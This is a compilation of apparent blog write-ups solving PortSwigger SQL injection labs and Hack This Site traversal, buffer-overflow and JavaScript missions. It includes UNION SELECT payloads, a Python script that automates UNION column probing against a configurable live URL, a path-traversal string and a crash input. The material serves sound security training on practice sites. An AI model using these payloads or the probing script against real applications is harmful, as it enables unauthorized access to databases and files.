PortSwigger Web Security Academy: SQL injection 2

Hello friends, today HaXeZ is looking at the second SQL injection lab on the PortSwigger Web Security Academy. This lab takes the UNION-based injection from the first lab and extends it: instead of only identifying the number of columns, we test which of those columns can hold text. We use the same methodology as in the first lab, then replace one of the NULL values at a time with a string.

SQL Injection UNION Attack, Finding a Column Containing Text

SQL Injection UNION Attack, Finding Columns With Text

As stated above, the purpose of this lab is to learn how to identify columns that can contain text. This matters because if you want to retrieve data from the database through a UNION attack, the value you retrieve has to be placed in a column whose data type is compatible with it: a string cannot be returned through a column that the original query treats as a number. This lab asks you to retrieve a specific string that it provides.

SQL Injection UNION Attack, Finding Columns With Text

The Application

The application is similar to the ones we have already seen: a navigation menu at the top with products listed underneath. At the top, however, is a message that says "Make the database retrieve the string ‘zns2kh‘" (the string changes each time the lab is started). To do this, turn Intercept on in Burp and click one of the category links, so we can work on the parameter that carries the injection.

The Application

Intercept and Repeat

As you can see from the image below, I intercepted the request with Burp and sent it to Repeater. I first determined how many columns there are with the Accessories'+UNION+SELECT+NULL,NULL,NULL-- method, adding NULLs until the application stopped returning a 500 error. The process is then repeated, but this time one NULL at a time is replaced with a string; in the example below I used ‘a‘ to determine which columns hold text. A column that returns a normal page with the string in place is string-compatible; one that returns a 500 error is not, because on most databases a quoted string cannot be unioned into a column of numeric type. As the results show, the second column contains text, since that request returns a valid response instead of a 500 error.

Burp Suite Repeater

The SQL Injection

To solve the lab, replace the string ‘a‘ with the string shown at the top of the page, in the column that accepted text. You could in fact do the whole lab with the required string instead of ‘a‘, but I needed to pad out this write-up to hit the desired word count. Anyway, that's the solution; I hope you found it useful.

Accessories'+UNION+SELECT+NULL,'your-string',NULL--
The SQL Injection

PortSwigger Web Security Academy: SQL injection 1

Hello friends and thanks for coming to HaXeZ, where today we're looking at the first SQL injection lab on the PortSwigger Web Security Academy. To keep things simple, I will do the labs in the order they appear on the all-labs page. While this doesn't make much sense from a difficulty perspective, it will keep things in order.

SQL Injection UNION Attack

SQL Injection UNION Attack

The first lab in the SQL injection series is a UNION-based attack that requires you to determine the number of columns returned by the query. While this is a fairly steep point of entry, I'm always one for jumping in at the deep end and learning to swim. The instructions explain that we need to use a UNION-based attack and that future labs build on this technique. There is a green button to access the lab.

Determining the number of columns returned by the query

The Application

Clicking the green button takes us to the application, which appears to be a shop with a navigation menu at the top of the page and products listed underneath it. We can make an educated guess that the query returns three columns, but there could be columns that are fetched and never displayed on the page, so the guess has to be tested. First, turn Intercept on in Burp Suite, then click one of the category links and go back to Burp to see the captured request.

The Application

Repeating The Payload

By far the easiest way to test payloads in Burp Suite is to send the request to Repeater. Repeater lets you modify and resend a request without having to intercept it again. Send the original request to Repeater by right-clicking in the request and choosing Send to Repeater. We then need to test how many columns the query returns. Insert a single quotation mark after the category value Accessories, then append the following: '+UNION+SELECT+NULL-- (the + encodes a space in the URL; make sure to include the space after the double hyphens, as some databases need it for the comment to be recognised). When you send this payload you should get a 500 error, which indicates the injected query failed: a UNION requires both SELECT statements to return the same number of columns, and a single NULL does not match the original query. That's good news, because it tells us one is not the right count, and the error will disappear once the count matches.

SQL Injection - Repeater

The SQL Injection

With our first payload giving an error, we increase the number of NULL values in the injection. The number of NULLs must equal the number of columns in the original query, so adding one at a time until the error disappears tells us how many columns there are. Add another NULL, then another, until you get the response shown in the picture above. You can then add the payload to your original request and forward it. The lab is already solved at that point, but it's nice to see how the injection is displayed on the page. The correct syntax is shown below.

Accessories'+UNION+SELECT+NULL,NULL,NULL--
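As an added example that is not part of the original write-ups or of the PortSwigger labs, the following Python script automates both probes: the column-count search from this lab and the string-compatible column probe from the second lab above. The parameter value Accessories, the URL template used by http_oracle and the assumption that a failed injected query produces a 500 response are modelled on the lab; simulated_oracle is a constructed stand-in for the shop so the script runs offline.

```python
# Added example, not code from the PortSwigger labs or the original posts: it
# automates the two probes described in labs 1 and 2. The parameter value
# "Accessories", the "HTTP 500 means the injected query failed" oracle and the
# URL template are assumptions modelled on the lab; simulated_oracle() is a
# constructed stand-in so the script runs offline.
from typing import Callable, List, Optional
import urllib.error
import urllib.parse
import urllib.request

# An oracle takes the full (injected) value of the category parameter and
# reports whether the application answered normally (True) or failed (False).
Oracle = Callable[[str], bool]


def union_null_payload(base_value: str, n_cols: int,
                       text_at: Optional[int] = None, marker: str = "a") -> str:
    """Build  base' UNION SELECT NULL,...,NULL--  with n_cols columns.

    If text_at is given, that (0-based) column holds the quoted marker string
    instead of NULL, which is the probe used to find string-compatible columns.
    The trailing space after -- is deliberate: some databases need it for the
    comment to be recognised (URL encoding turns it into the '+' in the write-up).
    """
    if "'" in marker:
        raise ValueError("marker must not contain a single quote")
    cols = ["NULL"] * n_cols
    if text_at is not None:
        cols[text_at] = f"'{marker}'"
    return f"{base_value}' UNION SELECT {','.join(cols)}-- "


def find_column_count(oracle: Oracle, base_value: str = "Accessories",
                      max_cols: int = 20) -> Optional[int]:
    """Lab 1: add NULLs one at a time until the UNION stops failing."""
    for n in range(1, max_cols + 1):
        if oracle(union_null_payload(base_value, n)):
            return n
    return None  # no count matched: the injection point or the oracle is wrong


def find_text_columns(oracle: Oracle, n_cols: int, base_value: str = "Accessories",
                      marker: str = "a") -> List[int]:
    """Lab 2: swap one NULL at a time for a string; columns that still answer
    normally can carry text, so that is where the required string goes."""
    return [i for i in range(n_cols)
            if oracle(union_null_payload(base_value, n_cols, text_at=i, marker=marker))]


def http_oracle(url_template: str) -> Oracle:
    """Oracle against a live target. url_template holds '{}' where the
    URL-encoded category value belongs, e.g. (hypothetical lab host)
    'https://LAB-ID.web-security-academy.net/filter?category={}'."""
    def check(payload: str) -> bool:
        url = url_template.format(urllib.parse.quote(payload, safe=""))
        try:
            with urllib.request.urlopen(url, timeout=10) as resp:
                return resp.status == 200
        except urllib.error.HTTPError:
            return False  # the lab answers 500 when the injected query fails
    return check


def simulated_oracle(n_cols: int = 3, text_cols=(1,)) -> Oracle:
    """Constructed stand-in for the shop: behaves like a query that returns
    n_cols columns, of which only text_cols accept a string in a UNION."""
    def check(payload: str) -> bool:
        _, _, select_list = payload.partition(" UNION SELECT ")
        if not select_list:
            return True  # no injection, normal page
        cols = select_list.rstrip("- ").split(",")
        if len(cols) != n_cols:
            return False  # column-count mismatch -> database error -> 500
        return all(c == "NULL" or i in text_cols for i, c in enumerate(cols))
    return check


def solve(oracle: Oracle, required: str, base_value: str = "Accessories") -> Optional[str]:
    """Chain both probes and return the payload that makes the database
    retrieve `required`, or None if no column can carry text."""
    n = find_column_count(oracle, base_value)
    if n is None:
        return None
    text_cols = find_text_columns(oracle, n, base_value)
    if not text_cols:
        return None
    return union_null_payload(base_value, n, text_at=text_cols[0], marker=required)


if __name__ == "__main__":
    # Offline run against the constructed oracle; swap in http_oracle(...) for a lab.
    print(solve(simulated_oracle(), "zns2kh"))
```

Against a real target, compare responses with a baseline rather than trusting the status code alone: some applications answer 200 with an error page, and some databases (SQLite, for instance) accept a string in any column, in which case the text probe tells you nothing about types. The lab's oracle is clean; real applications rarely are.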
Lab Solved

Burp Suite Certified Practitioner – Getting Started

Hello and welcome to HaXeZ. Today we're going to talk about the Burp Suite Certified Practitioner certification. For those new to cybersecurity, Burp Suite is one of the best web application testing tools available. You may also not know that PortSwigger (the company behind it) offers a certification for Burp Suite. Furthermore, the exam to get the certificate is currently only $99! Additionally, if you pass it before December 10th, 2021, they will refund you!!!

Burp Suite Certified

Burp Wait, There's More

The professional version of Burp Suite requires an annual licence fee (around $300), and the professional version is required to take the exam. However, you can register and download a 30-day free trial to practise with and take the exam. You don't need to provide any credit card information; just sign up and download the client. If you have some spare time, then 30 days should be plenty to prepare for the exam (I hope).

Free Trial

Portswigger Web Security Academy

Did I mention that their academy is completely free to access? All of the resources you need to learn to pass the exam are on their website, and it even includes a progress tracker to show how far you have come since starting. There are articles on each vulnerability class and then labs to practise attacking them. Each completed lab adds to your learning progress.

Burp Suite Learning Progress

Learning Paths

There are three distinct learning paths: Server-Side Topics, Client-Side Topics, and Advanced Topics. Each path is broken down into sections covering different vulnerability classes. For example, the first recommended learning path is Server-Side Topics, which covers subjects like SQL injection, XXE injection, and command injection.

Server-Side Topics

The Client-Side Topics path has various modules including cross-site scripting, cross-site request forgery, and clickjacking. It covers everything that can be exploited from the client side, in the browser.

Client-Side Topics

Finally, the Advanced Topics path covers areas like insecure deserialization, server-side template injection, and web cache poisoning. There are 21 modules in total. However, the modules vary in size, so you could complete a couple of modules a day.

Wish me luck as I begin my BSCP journey.

Hack This Site: Extended Basic – Mission 2

Hello friends and welcome to HaXeZ, where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple provided you understand how web applications are laid out on disk. It requires us to craft the input to the provided script so that it reads the index.php page at the root of the web application. To do that we need to perform a directory traversal up two directories.

The Function

As you can see from the screenshot below, we have some fairly basic PHP code that reads the contents of the file named by the ‘filename‘ value. It appends the extension ‘.php‘ to whatever filename is supplied before opening it. Underneath the code, we have a submission box where we need to submit the solution to the challenge.

Extended Basic Mission 2 - The Function

The Solution

Given these points, all we need to do to solve this mission is tell the script to navigate up two directories. The script lives in the ‘extbasic‘ directory (‘/missions/extbasic/2‘), so traversing up two directories puts us in the root directory. Once there, we need to specify ‘index.php‘; however, the file extension ‘.php‘ is appended for us, so we only need to specify the word index. The correct solution is therefore ‘../../index‘. Paste that into the check form and you should complete the mission and be able to proceed to the next one.

Extended Basic Mission 2 - The Solution

Extended Basic Mission 2 – Conclusion

This is a simple but fun challenge that tests your knowledge of web application directory structures and your ability to read code. While I wouldn't have a clue how to write this off the top of my head, I easily worked out what the code is attempting to do. Once you understand what the code does, and you understand the rules of the mission, it's fairly simple. This type of attack is known as directory (or path) traversal. It is prevented by not building file paths from raw user input: validate the supplied name against an allowlist or a strict pattern, or resolve the final path and check that it still lies inside the intended base directory before opening it, and run the application with file permissions that limit what it can read. Appending a fixed extension, as this script does, is not a defence, because the ‘../‘ segments are still honoured. Anyway, I hope this helped you solve the mission.
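As an added example that is not the mission's own PHP, here is the same include pattern written in Python, first in the vulnerable form the mission uses and then hardened with a containment check on the resolved path. The directory layout, file names and file contents are constructed here for the demonstration.

```python
# Added example, not the mission's own PHP: the same pattern as the mission's
# script, written in Python, first as the vulnerable version and then hardened
# with a containment check. The directory layout, file names and file contents
# are constructed here for the demo.
import os
import tempfile

EXT = ".php"


def read_vulnerable(base_dir: str, filename: str) -> str:
    """Mirrors the mission's script: append the extension and open whatever
    path results. '../../index' escapes base_dir because the '..' segments
    are honoured by the filesystem."""
    path = os.path.join(base_dir, filename + EXT)
    with open(path, encoding="utf-8") as f:
        return f.read()


def read_hardened(base_dir: str, filename: str) -> str:
    """Resolve the final path and refuse it unless it is still inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename + EXT))
    # commonpath, not startswith: '/app/missions' must not accept '/app/missions2/x'
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing path outside {base}: {filename!r}")
    with open(target, encoding="utf-8") as f:
        return f.read()


def build_demo_tree() -> str:
    """Constructed layout mirroring the mission: <root>/index.php and
    <root>/missions/extbasic/2.php."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "missions", "extbasic"))
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as f:
        f.write("root index")
    with open(os.path.join(root, "missions", "extbasic", "2.php"), "w", encoding="utf-8") as f:
        f.write("mission 2")
    return root


def demo() -> dict:
    """Run both readers against a legitimate name and against traversal input."""
    root = build_demo_tree()
    base = os.path.join(root, "missions", "extbasic")
    results = {
        "legit_vulnerable": read_vulnerable(base, "2"),
        "traversal_vulnerable": read_vulnerable(base, "../../index"),
        "legit_hardened": read_hardened(base, "2"),
    }
    # Relative traversal and an absolute path (os.path.join discards the base
    # when the second argument is absolute) must both be refused.
    for name in ("../../index", "/etc/passwd"):
        try:
            read_hardened(base, name)
            results[name] = "allowed"
        except PermissionError:
            results[name] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fixed extension in the original script is not a control: the traversal segments still work, and on PHP versions before 5.3.4 a null byte in the input would even truncate the appended extension. The check that actually matters is the one on the resolved path.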

Hack This Site: Extended Basic – Mission 1

Hello and welcome to HaXeZ where today we’re looking at Hack This Site Extended Basic Mission 1. The mission is titled “Over and Over?” and requires you to perform a buffer overflow to complete it. Upon navigating to the mission we are greeted with a message that explains that we have a C program that calculates the length of the user input. It goes on to explain that we need to crash the program. It also provides us with the source code of the application.

Extended Basic Missions

Mission 1 – Source Code

I'm not going to pretend I know the ins and outs of the C programming language; it was a bit before my time, so I've never learned it. However, looking at the source code we can see that it declares a function with a void return type, and the line ‘char lol[200]‘ declares a fixed-size buffer of 200 bytes. Taking this into consideration, input longer than 200 characters will be written past the end of that buffer, which is likely to crash the program.

Extended Basic Mission 1 - Application Source Code

Mission 1 – Buffer Overflow

A buffer overflow occurs when you send more data to a program than the space it has set aside for that data. Each buffer in a program has a fixed allocation of memory, and if more data is written into it than was allocated, the excess spills into adjacent memory and unexpected results follow. This will often crash the program, but in some cases it can allow code execution, because the overwritten memory may hold control data such as a saved return address. The purpose of this mission, however, is just to crash the program. We know the buffer holds 200 characters, so if we generate 250 characters in a bash terminal using ‘printf 'A%.0s' {1..250}‘ (brace expansion repeats the format 250 times, printing one A each time) and submit them to the application, we should crash it.

Terminal Generating String

Mission Complete

Now if we copy and paste that string into the application's submission box and click submit, it should be processed and the mission completed. We can tell the mission is complete because a blue Go On button appears underneath the input form.

Mission Complete

Hack This Site: Javascript Mission – Level 7

Well done, friends of HaXeZ, we have done it: we have made it to the last Javascript mission on Hack This Site. After all those other missions I feel like I'm a scripting savant. Ok, maybe not, but progress is progress. Once we have completed this mission, we can move on to other, more exciting missions. This mission is a lot like one of the previous missions; however, instead of just the password being encoded or obfuscated, this time the whole script is obfuscated.

JS Obfuscation FTW

Introduction

Navigating to the mission we can see a password input form. There isn’t much more information than that other than the title and a thank you message to the creator. If we submit test data to the password input form then we will get an incorrect error message. In order to see what’s going on, we need to view the page source of the application.

The Mission

The Javascript

As you can see from the image below, the script appears to be garbled: it's all X's followed by two-digit numbers. We could attempt to decode it online, but there is a far easier route. All we need to do is right-click the Check Password button, choose Inspect, and look at the handler behind it.

The Javascript

The Button Javascript

As the screenshot below shows, inspecting the button reveals the Javascript that powers it. The script checks whether the user-submitted value ‘pass‘ matches the value ‘j00w1n‘. If the values match we get an alert saying "You WIN!"; if not, a message saying "WRONG! Try Again". Because the comparison runs in the browser, the expected password is necessarily delivered to the client in the clear, and obfuscating the rest of the script does nothing to change that.

The Button - Javascript

The Solution

Therefore, to complete this mission, and with it the Javascript series, all you need to do is submit the value ‘j00w1n‘ to the password form. As the image below shows, we get the alert box telling us we have successfully completed the mission.

You Win!

Alternative Method

I'm sure the developers didn't intend for this mission to be this easy; I fully believe they wanted us to deobfuscate the code. For that reason, the screenshot below shows me deobfuscating the code with GCHQ's CyberChef tool. As the screenshot shows, the output contains the button's handler with the password in it.

Hack This Site: Javascript Mission – Level 6

Introduction

Hello friends and welcome to HaXeZ. Today we're going to solve Javascript Mission 6 on Hack This Site. This challenge isn't too difficult provided you pay attention to the details. The mission reuses the script from a previous mission to distract you; however, the script that actually checks the password is loaded from another file in the application.

go go away .js

The Mission

Navigating to the mission we see the expected password submission form. However, instead of Faith, this time we have a message saying that Fiftysixer has decided to try creating some Javascript. It explains that he forgot to remove the previous code, which has made the new code more confusing, but apparently Fiftysixer likes it that way. We can submit test data to the form, but we get an incorrect error message.

The mission

The Javascript

If we view the Javascript we can see that it looks a lot like the script from a previous mission. That script tried to trick us by comparing a variable with a string rather than assigning the string to the variable, and the solution to that mission was ‘moo‘. However, if we submit ‘moo‘ to the password form here, we still get an incorrect error message. Notably, the page also loads what appears to be another Javascript file called checkpass.js, and the name suggests it has something to do with the password-checking functionality.

The Javascript

The Real Javascript

If we navigate to the script in the URL we can see that it is indeed the script that checks the password. As you can see from the image below, the Javascript declares three variables and assigns them values.

dairycow="moo";
moo = "pwns";
rawr = "moo";

The lack of spaces around the equals sign in the ‘dairycow‘ line is not significant; Javascript ignores whitespace there, and ‘dairycow‘ is not used by the check anyway. After the variable assignments there is a function that checks the password. It states that if the value submitted by the user equals the value of ‘rawr‘, followed by a space in quotation marks, followed by the value of ‘moo‘, then we win; if not, we lose. The quoted space between ‘rawr‘ and ‘moo‘ means our submission must contain a space: the expected value is "moo", a space, then "pwns".

The Real Javascript

The Solution

So that's all we need to do to solve the mission: submit ‘moo pwns‘ as the password and you should complete it. Congratulations.

The Solution

Hack This Site: Javascript Mission – Level 5

Introduction

Hello World Wide Web and welcome to HaXeZ where today we will be looking at the Javascript Mission 5 on Hack This Site. This mission was a lot of fun and even gave me an excuse to use the GCHQ CyberChef tool to deobfuscate some encoded text. The mission is fairly simple provided you know what to do with the data that you find.

Javascript Mission 5

The Mission

Upon navigating to the mission we are greeted with a password input form and some text asking if Faith spelled Runescape wrong. This comes into play a bit later, as it is a hint at the name of the Javascript function used to encode the password (unescape). We could input some text into the password form and submit it, but without the correct text we will get an error message telling us the password is wrong.

Password Submission Form

The Javascript

However, if we inspect the password form or view the page source we can see the Javascript. The first part of the script declares a variable named ‘moo‘ and assigns it the result of calling unescape. The ‘unescape()‘ function returns a new string in which each %XX hexadecimal escape sequence is replaced with the character it represents. The argument passed to ‘unescape‘ is the following encoded string: ‘%69%6C%6F%76%65%6D%6F%6F‘.

The Javascript

Javascript Deobfuscation

To decode the string, we can use our favourite government-developed decoding tool, CyberChef. Surprisingly, CyberChef works really well considering it came from the public sector (please don't arrest me). As can be seen from the image below, the interface is simple: choose a recipe (URL Decode handles %XX sequences), paste in your encoded text, and it works its magic and decodes it for you. It even has a Magic recipe that tries to detect automatically what you have pasted in. It really is a great application.

CyberChef

The Solution

As shown above, the decoded text turns out to be ‘ilovemoo‘. If you submit that to the password form then you should complete the mission.

The Solution

Congratulations you have now completed Javascript mission 5.

Congratulations

Hack This Site: Javascript Mission – Level 4

Introduction

Hello there internet and welcome to HaXeZ where today we will be solving Hack This Site Javascript Mission 4. This mission is a little deceptive due to the way that the Javascript is written. To put it another way, this mission intentionally tries to trick you into thinking the value of a variable is something else. However, our keen attention to detail is enough to complete the mission.

Javascript Mission 4

The Mission

The mission is called Var, which we can deduce means we're going to be working with variables again. As can be seen from the image below, the message reads "Faith is trying to trick you… she knows that you're tired after all the math works". To sum up, Faith is going to attempt some shenanigans to prevent us from completing this mission. We can test the form with random data to see what happens, but as expected we just get an alert informing us that it is incorrect.

The Mission

The Javascript

If we inspect the page we can see the script that powers the functionality, and this is where the first deception comes in. If you view the page source instead of inspecting the element, you may not notice that the first variable is being set: the image below shows the assignment on the far right of a long line. It's probably a bit too small to see, though.

Hidden moo

If we inspect the script we can see that at the very start the value ‘moo‘ is assigned to the variable ‘RawrRawr‘ with a single equals sign, which is assignment in Javascript. Next, a function called ‘x‘ is created in which ‘hack_this_site‘ appears alongside ‘RawrRawr‘ with a double equals sign. At first glance it looks as though ‘RawrRawr‘ is being changed there, but it isn't: in Javascript a double equals sign is a comparison operator, so all that happens is that ‘hack_this_site‘ is compared with ‘RawrRawr‘, and the variable keeps its value.

The Javascript

The Solution

The value of ‘RawrRawr‘ is therefore still ‘moo‘; let's see what the script does next. It has an if statement that compares ‘x‘ to an empty string (two speech marks with nothing between them) plus the value of ‘RawrRawr‘. In essence, the script is checking the value of ‘x‘ against nothing plus ‘moo‘, which is just ‘moo‘. Therefore, the password to complete the mission should be moo. Enter that in the box and click submit to score.

The Solution

Hack This Site: Javascript Mission – Level 3

Introduction

Hello Internet, welcome to HaXeZ, where today we're going to solve the third Javascript mission on Hack This Site. Judge me how you will, but I have to admit that I learned a lot from this challenge. My time at school was less than ideal, so I didn't go very often. Unfortunately, this meant I missed out on a lot of important subjects, including mathematics. I hadn't even heard of BODMAS until today, and I'm 35. I have no idea how I've made it this far in computing without knowing it. This challenge is fairly simple provided you know how variables work and know some maths.

Javascript Mission Level 3

The Javascript

Looking at the code below we can see that we need to submit a password that is the same length as the value of the variable ‘moo‘. We know this because of the if statement that requires ‘x.length == moo‘ for us to get the alert that we have won the mission. In order to get the value of ‘moo‘, we need to perform some calculations to work out the value.

Javascript Maths

The Mathematics

Ok, let’s break down the maths.

The value of ‘foo‘ is 47, because under BODMAS the multiplication in 6 * 7 + 5 is evaluated first: 42 + 5.

The value of ‘bar‘ is 7, because it is the remainder (modulus) of 47 divided by 8.

Therefore, the value of ‘moo‘ is 14, because ‘moo‘ is ‘bar‘ * 2 and ‘bar‘ is 7.

We can discard the value of ‘rar‘, because ‘rar‘ is not used anywhere in the calculation. That leaves us with 14. We know that the password submission form requires our input to be the same length as ‘moo‘, so we should be able to submit any 14 characters to complete the mission.

Submitting 14 Characters

Congratulations

After submitting 14 characters to the password submission form, you should complete the challenge. That's all there is to it. However, if you don't know about BODMAS, which I didn't, or that a percentage sign in programming means modulo (the remainder of a division), it could be difficult.